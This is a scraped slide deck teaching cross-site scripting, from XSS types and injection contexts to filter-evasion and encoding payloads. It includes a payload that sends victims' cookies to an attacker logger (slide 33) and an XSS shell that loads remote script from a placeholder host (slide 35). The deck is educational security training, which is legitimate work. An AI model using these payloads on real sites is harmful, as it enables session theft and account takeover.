![Reflected XSS
What is wrong with the above code?
The above code just prints the comment which is
retrieved from the $_GET variable.
Can add malicious JavaScript with the original URL.
<?php
echo '<h1>Hello ' . $_GET["name"]. '</h1>';](https://image.slidesharecdn.com/xssprimer-snoopysecurity2-151106145308-lva1-app6892/85/XSS-Primer-Noob-to-Pro-in-1-hour-5-320.jpg)
![URL Context
The input is reflected back in a href attribute. E.g.
<iframe src=“[Reflected Data]”>
<a href==“[Reflected Data]”>Link</a>
<META http-equiv=“refresh” content=““[Reflected Data]”>
No need to break out of context. Only need to encode
payloads. This type of context requires the victim to click
the URL to execute.](https://image.slidesharecdn.com/xssprimer-snoopysecurity2-151106145308-lva1-app6892/85/XSS-Primer-Noob-to-Pro-in-1-hour-18-320.jpg)
XSS Primer - Noob to Pro in 1 hour
- 1. XSS Primer: Noob to Pro in 1 hour By @snoopy_security
- 2. Who and Why • Student & Junior Security Consultant. • XSS is a easy win if you do it correctly. • Bug bounties pay well and clients give you respect. • Cross site scripting is one of the oldest web application attacks known and is to be dated around 1996-1998
- 3. What is XSS? Untrusted data from user is processed by the application without any sort of validation. It affects client side but the vulnerability resides in the server side. Different types Reflected, Stored and DOM XSS
- 4. What is XSS?
- 5. Reflected XSS What is wrong with the above code? The above code just prints the comment which is retrieved from the $_GET variable. Can add malicious JavaScript with the original URL. <?php echo '<h1>Hello ' . $_GET["name"]. '</h1>';
- 6. Some Beginner Tips XSS can come from anywhere. Some common ones are URL parameter Headers i.e user agent Metadata Input forms Text area Hidden fields Flash parameters File Uploads
- 7. Some Beginner Tips 1. Try injection HTML Tags as well and malicious JavaScript 2. SVG is always good for a short and crisp attack vector. Can add whitespaces forward slashes and unclosed tags. 3. Add junk data with your payload 4. Always try a couple of different payloads. This mainly applies when trying to evade filters. "><svg/onload=prompt(1)>
- 8. Stored XSS Malicious payload is stored by the server though database or other forms of storage and is reflected back. This form of attack is easier than phishing with XSS payloads. Can get admin cookies as well access to the internal network depending on the attack vector.
- 9. DOM XSS The document object model is a structured representation of the web page rendered by the browser. DOM is where event handlers and any other JavaScript functions execute. DOM shows all the JavaScript and HTML rendered by your browser. DOM defines a way a webpage accessed and manipulated. An attacker can manipulate the DOM by adding malicious JavaScript which can change elements set by the DOM to attack a victim.
- 10. DOM XSS To find DOM XSS, analyse the JavaScript being executed on the page and see if DOM being written. DOM is not view source. Inspect element is a better visual representation of the DOM. ZAP,Burp and other proxies does pick up unsafe methods but you will need to check manually. If it cannot be exploitable, try figuring about what library and unsafe sink the application is using. E.g. jquery .attr()
- 11. DOM XSS Common methods used to access DOM document.location document.URL document.URLUnencoded document.referrer window.location Passed data can then be written by methods such as eval, document.write and window.setinterval.
- 12. Useful sources OWASP DOM XSS prevention cheat – gives you good explanation on unsafe methods that directly modify DOM. The DOM XSS wiki :https://code.google.com/p/domxsswiki/wiki/Introduction The wiki has useful information on dangerous methods, common sources and sinks. Other variations include Mutation XSS. More on that later…..
- 13. Context is Everything Context is where the given input is reflected back. Five common ones 1. HTML 2. Attributes 3. Script 4. URL 5. Style
- 14. HTML Context Malicious input in reflected back in the html body in tags such as <div><p><title> and more. Easiest to attack Close the tag and try <script>alert(1)</script> or any similar payload.
- 15. Attribute Context HTML elements can have attributes. Attributes are Input is reflected in a attribute element. So look for input being reflected back in ‘value =‘ or ‘alt =‘ or something similar. Most of the time, attributes will be inside a single or a double quote.
- 16. Couple of tips 1. Break out of the context by closing the quote and attribute tag. E.g ‘> 2. Any type of encoding won’t help your payload if you can’t break out of context. 3. If in doubt, URL-encode any special characters that have signify & = + ; and space. aas' onload='prompt(0);'' 4. Event handlers can also be used to attack attributes aas' onload='prompt(0);''
- 17. Script Context The input will be reflected back inside a script tag. break out of text with quotes and execute Input is usually reflected back as part of a variable. Payload example junk' ; alert(1);//
- 18. URL Context The input is reflected back in a href attribute. E.g. <iframe src=“[Reflected Data]”> <a href==“[Reflected Data]”>Link</a> <META http-equiv=“refresh” content=““[Reflected Data]”> No need to break out of context. Only need to encode payloads. This type of context requires the victim to click the URL to execute.
- 19. Tips Common ways to attack URL Context The above payload is base64 encoded. More about encoding later. You can also define the charset just like data, this might be useful in some cases. javascript:prompt(0) data/text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- 20. CSS Context Also know as style context Input is usually reflected in inside a style tag Can be attacked using Another common one width:expression(alert(‘XSS’))
- 21. WAF Detection Usually Regex, Blacklist or whitelist based WAF can sometimes detect inbound as well as outbound. Most WAFs still detect using a signature based approach. Common way to detect WAFs: Modified cookies, rewritten headers and response codes
- 22. WAF Detection Find combinations of allowed and block characters first. Some known tools to detect WAF. • Wafw00f • http-waf-fingerprint NSE script • http-waf-detect NSE script Will only detect the popular ones. xss,<>{};”’script
- 23. Filter Evasion 101 More than one ways to skin a web app! If <script> tag is blocked> If site is filtering double and single quotes, you can use back tick (`). This technique only works on IE. “><script >alert(document.cookie)</script > “><ScRiPt>alert(document.cookie)</ScRiPt> “%3e%3cscript%3ealert(document.cookie) %3c/script%3e “><scr<script>ipt>alert(document.cookie)</scr</s cript>ipt> %00“><script>alert(document.cookie)</script>
- 24. Filter Evasion Some popular techniques consists of spaces, encoding and comments. Try using prompt or confirm instead of alert Calling a external JavaScript file from inside a script source tag if brackets and quotes are blocked. If the application is filtering quotes or blocking script tags, try the below <SCRIPT SRC=https://web.archive.org/web/20150121175718/http://ha.cker s.org/xss.js></SCRIPT> <img/src=x onerror=prompt(/XSS/);>
- 25. Filter Evasion When in doubt, try to comment everything after your payload. If less than and greater than sign is filtered in attribute context, try If script and src tags are blocked in a html context, try <script>alert(1)</script><!-- (html/attribute context) “;alert(5);// (script context) “ onload=“prompt(0);”” <object data=“javascript:alert(0)”>
- 26. Filter Evasion resources Too many techniques to present. Check them out here https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat _Sheet http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html http://n0p.net/penguicon/php_app_sec/mirror/xss.html
- 27. Encoding Encoding – transferring data from one format to another. E.g. ASCII, Unicode, URL Encoding etc Browsers support numerous encoding schemes but the attack vector depends on the page and its meta tag e.g. Encoding is useful if the server is decoding correctly. Still need to break out of context correctly for the encoded payload to work. <svg/onload=alert()>>
- 28. Encoding The following table describes how a user can obfuscate an IP address: This trick is getting more common among phishers. E.g. http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/ SignIn URL Form http://127.0.0.1/ Decimal http://2130706433/ Dword http://0x7f.0x00.0x00.0x01/ Hex http://0177.0000.0000.0001/ Octal http://127.0x00.0000.0x01/ Mixed
- 29. Encoding fromCharCode() method converts Unicode values into characters Long UTF-8 Unicode encoding to bypass filters <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <img src=x onerror="java 15cript� 000058alert ('XSS� 0039)">
- 30. Encoding Encoding can also be useful to break up an XSS payload if the server is using pattern matching regex. Can also double encode payloads. Depends on how the application processes encoded client requests. The hexadecimal encoding of “../” represents "%2E%2E%2f“ Double encoding of “../” represents "%252E%252E%252F" <IMG SRC="jav	ascript:alert('XSS');">
- 31. More Filter Evasion ASCII Decimal Encoded Will turn into alert(‘XSS’). The payload uses html entities which is decoded and rendered by the browser. ASCII Hex Encoded Useful for bypassing ‘magic_quotes_gpc’ javascr ipt:alert ('XSS') javascrip ;t:alert( 7;XSS')
- 32. Encoding More Examples here: http://htmlpurifier.org/live/smoketests/xssAttacks.php https://danielmiessler.com/study/encoding/ Some useful encoders: http://n0p.net/penguicon/php_app_sec/mirror/xss.html http://evuln.com/tools/xss-encoder/ https://mothereff.in/html- entitieshttp://dev.w3.org/html5/html-author/charref https://hackvertor.co.uk/public http://utf-8.jp/public/jjencode.html?src=
- 33. Actual attack vectors <script>window.location="http://example.com/logger.php? cookie="+document.cookie;</script> When executed, the above code sends the victims cookie to an attacker controlled site. Can be used for many things including cookie stealing, drive by downloads, running browser exploits, phishing and more. BeEF makes everything easy More cool XSS payloads:http://www.xss-payloads.com/
- 34. Useful tools Opinion: Most scanners suck at finding XSS. Couple of tools I like – Xenotix, XSSValidator Burp Plugin, Sleepy puppy (If testing multiple applications, has trackable XSS payloads) How to build a scanner that works? A - Scanning within a browser engine. B - Using PhantonJS or similar webkit detect successful reflected XSS. I still prefer finding XSS manually but I like having options
- 35. XSS Shell Demo Cool POC by Brutelogic. Fun way to report XSS than just script alert(1). Attacker machine listener Target payload <svg/onload=setInterval(function() {d=document;z=d.createElement("script");z.src="//HOST:PORT";d. body.appendChild(z)},0)>
- 36. Things I didn’t mention Flash XSS – Embedded SWF files can be decompiled to source code. This can be used to find unfiltered variables which can be called from an URL to include malicious XSS. XSS Polyglot – Upload a flash file and be accepted as vaild JavaScript. Run remote XSS with src tag. (can be beat CSP in rare cases) Mutation XSS – There are more ways to trick DOM into parsing malicious XHTML like payloads. All worth checking out…..